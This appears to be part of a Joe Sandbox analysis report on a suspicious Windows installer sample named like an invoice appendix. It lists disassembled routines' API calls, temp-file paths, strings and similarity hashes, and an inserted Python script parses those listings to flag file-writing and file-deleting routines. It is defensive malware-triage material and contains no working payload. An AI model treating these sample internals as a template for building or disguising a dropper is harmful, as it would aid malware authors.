• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,?), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,Centraleuropisk Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: Centraleuropisk Setup$F
                                                                                                              • API String ID: 941294808-2596094117
                                                                                                              • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                              • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                                                                              • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                              • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
APIs
• lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A28
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A4C
• GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A55
  • Part of subcall function 004058D6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
  • Part of subcall function 004058D6: lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
• GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A72
• wsprintfA.USER32 ref: 00405A90
• GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405ACB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405ADA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B12
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B7A
• GlobalFree.KERNEL32(00000000), ref: 00405B81
• CloseHandle.KERNEL32(00000000), ref: 00405B88
  • Part of subcall function 00405971: GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
  • Part of subcall function 00405971: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %s=%s$NUL$[Rename]
• API String ID: 1265525490-4148678300
• Opcode ID: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
• Instruction ID: b5c81c1859d8f1192d2ecd791256e289f06fc5ca0860dc0d9e47344a35b8d296
• Opcode Fuzzy Hash: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
• Instruction Fuzzy Hash: 2F41CE71604B19BFD2206B615C49F7B3A6CEB45764F14013AFD05B62D2EA7CB8018E7E
APIs
• wsprintfA.USER32 ref: 1000243B
• GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002453
• StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002464
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002479
• GlobalFree.KERNEL32(00000000), ref: 10002480
  • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
• GlobalFree.KERNEL32(?), ref: 100024F7
• GlobalFree.KERNEL32(00000000), ref: 10002520
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
• String ID:
• API String ID: 2278267121-0
• Opcode ID: 81b508f8566c72cb6bbb7f925887647fde0818022af9d0756ca2701a40b1599b
• Instruction ID: 4bda31b1a44bf33176999a02eb948954730f0d1b170e125cf388d9069a493b86
• Opcode Fuzzy Hash: 81b508f8566c72cb6bbb7f925887647fde0818022af9d0756ca2701a40b1599b
• Instruction Fuzzy Hash: 9841BFB1209616EFFB51CFA4CCC8E2BBBECFB042D57124529FA5592168CB31AC50DB25
APIs
• lstrlenA.KERNEL32(?), ref: 100022CD
• GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
• GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
• CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
• GlobalFree.KERNEL32(00000000), ref: 1000232F
• GlobalFree.KERNEL32(00000000), ref: 10002366
  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
• String ID: @H3w
• API String ID: 3955009414-4275297014
• Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
• Instruction ID: d69edb42b16e9a526c81b887825c6d31ceffefc99351cdbd06d67dbb68f1f7db
• Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
• Instruction Fuzzy Hash: FC417C71509301EFF760DF648888B6AB7FCFB443D1F218929F946D6199DB34AA40CB61
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FA3
• CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
• CharNextA.USER32(?,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FB5
• CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FC5
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F4C, 00405F51
• "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 00405F87
• *?|<>/":, xrefs: 00405F93
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
• API String ID: 589700163-35069653
• Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
• Instruction ID: b0dad545636566696c56c87c00777fa542562a183f3785fc597fb34056e0d2ab
• Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
• Instruction Fuzzy Hash: 08110161808B9269FB3216340C44B7BBF99CF5A760F28007BE9C0732C2D77C5C429A6D
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00404052
• GetSysColor.USER32(00000000), ref: 0040406E
• SetTextColor.GDI32(?,00000000), ref: 0040407A
• SetBkMode.GDI32(?,?), ref: 00404086
• GetSysColor.USER32(?), ref: 00404099
• SetBkColor.GDI32(?,?), ref: 004040A9
• DeleteObject.GDI32(?), ref: 004040C3
• CreateBrushIndirect.GDI32(?), ref: 004040CD
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
• Instruction ID: aac8be200c2a37c7c3a3d9d61c48e2962f0c237efd7738e790c95123d26b84df
• Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
• Instruction Fuzzy Hash: 732184B19047049BC7319F68DD08B4BBBF8AF41714F048A29EA95F22E1D738E944CB55
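The per-routine API listings in this report follow a fixed shape (an "APIs" header, one bullet per call as Api.MODULE(args), ref: address, with calls made inside a callee indented and prefixed "Part of subcall function <addr>:"), which makes them easy to pull into a script when triaging many functions at once. The parser below is an added example and is not part of the Joe Sandbox report or of the Joe Sandbox product; its sample input is copied from two routines in this section (the file-write/delete routine at 004026D9 in full and the one whose listing starts at 00405A28 excerpted), and the "self-deleting writer" check is a heuristic of my own, not a Joe Sandbox signature.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: API bullets copied from two routines listed in this
# report (the routine at 004026D9 in full, the one starting at 00405A28 excerpted).
# One "APIs" header per routine, one bullet per call; calls made inside a callee
# are indented and prefixed "Part of subcall function <addr>:".
SAMPLE = r"""
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
• GlobalFree.KERNEL32(?), ref: 0040272E
• WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
• GlobalFree.KERNEL32(00000000), ref: 00402747
• CloseHandle.KERNEL32(?), ref: 0040275F
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
APIs
• wsprintfA.USER32 ref: 00405A90
• GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405ACB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405ADA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B12
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B7A
• CloseHandle.KERNEL32(00000000), ref: 00405B88
  • Part of subcall function 00405971: GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
  • Part of subcall function 00405971: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
"""

# One bullet: optional subcall prefix, Api.MODULE, optional "(args)" (wsprintfA is
# printed without an argument list in the report), then ", ref: <address>".
CALL_RE = re.compile(
    r"^\s*•\s+"
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HEXWORD_RE = re.compile(r"^-?[0-9A-F]{8}$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # address of the callee this bullet belongs to, if any


@dataclass
class Routine:
    calls: List[Call] = field(default_factory=list)

    def direct_apis(self) -> List[str]:
        """APIs the routine calls itself, excluding 'Part of subcall' bullets."""
        return [c.api for c in self.calls if c.caller is None]


def parse_listing(text: str) -> List[Routine]:
    """Split a Joe Sandbox function listing into routines and parse each API bullet.
    Bullets that are not API calls (Strings, Memory Dump Source, Similarity) are skipped."""
    routines: List[Routine] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            routines.append(Routine())
            continue
        m = CALL_RE.match(line)
        if not m or not routines:
            continue
        raw_args = m.group("args")
        args = raw_args.split(",") if raw_args is not None else []
        routines[-1].calls.append(
            Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("caller"))
        )
    return routines


def self_deleting_writer(routine: Routine) -> bool:
    """Heuristic (my own assumption, not a Joe Sandbox signature): the routine itself
    both writes a file and deletes one, the shape of a drop-use-delete temp file."""
    apis = set(routine.direct_apis())
    return "WriteFile" in apis and bool(apis & {"DeleteFileA", "DeleteFileW"})


def string_args(routine: Routine) -> List[str]:
    """Literal string arguments: anything that is neither a hex word nor an unknown '?'.
    These are the quickest candidates for IOC or YARA strings."""
    return [
        a for c in routine.calls for a in c.args
        if a and a != "?" and not HEXWORD_RE.match(a)
    ]


if __name__ == "__main__":
    for r in parse_listing(SAMPLE):
        print(r.calls[0].ref, "->", ",".join(r.direct_apis()))
        print("  self-deleting writer:", self_deleting_writer(r))
        print("  strings:", string_args(r))
```

Run against the whole exported function list, the same loop gives one line per routine with its direct API sequence, so the routines worth opening in IDA (file writers, anything touching [Rename] or the Temp path) stand out without reading every block. Splitting arguments on commas is adequate for this report because none of its string arguments contain a comma; a listing that does would need a quote-aware split.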
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
• GlobalFree.KERNEL32(?), ref: 0040272E
• WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
• GlobalFree.KERNEL32(00000000), ref: 00402747
• CloseHandle.KERNEL32(?), ref: 0040275F
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID:
• API String ID: 3294113728-0
APIs
• lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
• lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
• lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
• SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402BF4
• GetTickCount.KERNEL32 ref: 00402C12
• wsprintfA.USER32 ref: 00402C40
  • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
  • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
  • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
  • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
• CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C64
• ShowWindow.USER32(00000000,00000005), ref: 00402C72
  • Part of subcall function 00402BC0: MulDiv.KERNEL32(00000000,00000064,00296833), ref: 00402BD5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048B1
• GetMessagePos.USER32 ref: 004048B9
• ScreenToClient.USER32(?,?), ref: 004048D3
• SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E5
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040490B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5F
• wsprintfA.USER32 ref: 00402B93
• SetWindowTextA.USER32(?,?), ref: 00402BA3
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
APIs
  • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,?), ref: 10001258
  • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
• GlobalFree.KERNEL32(?), ref: 1000188C
• GlobalFree.KERNEL32(?), ref: 10001A18
• GlobalFree.KERNEL32(?), ref: 10001A1D
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FreeGlobal$lstrcpy
• String ID:
• API String ID: 176019282-0
APIs
• GetDlgItem.USER32(?), ref: 00401CD0
• GetClientRect.USER32(00000000,?), ref: 00401CDD
• LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
• DeleteObject.GDI32(00000000), ref: 00401D1B
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
APIs
• lstrlenA.KERNEL32(0041FCE0,0041FCE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D4,000000DF,0000040F,00000400,00000000), ref: 00404842
• wsprintfA.USER32 ref: 0040484A
• SetDlgItemTextA.USER32(?,0041FCE0), ref: 0040485D
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
APIs
• SetWindowTextA.USER32(00000000,Centraleuropisk Setup), ref: 00403AC6
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$1033$Centraleuropisk Setup
• API String ID: 530164218-1997691186
APIs
• lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403203,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405776
• CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403203,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 0040577F
• lstrcatA.KERNEL32(?,00409014), ref: 00405790
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405770
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user~1\AppData\Local\Temp\
• API String ID: 2659869361-2382934351
APIs
• GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
• GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
• VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
  • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
Similarity
• API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
• String ID:
• API String ID: 1404258612-0
APIs
• CharNextA.USER32(?,?,luggages.con,?,00405875,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405817
• CharNextA.USER32(00000000), ref: 0040581C
• CharNextA.USER32(00000000), ref: 00405830
Similarity
• API ID: CharNext
• String ID: luggages.con
• API String ID: 3213498283-617196232
APIs
• IsWindowVisible.USER32(?), ref: 00404F6E
• CallWindowProcA.USER32(?,?,?,?), ref: 00404FBF
  • Part of subcall function 0040401A: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040402C
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
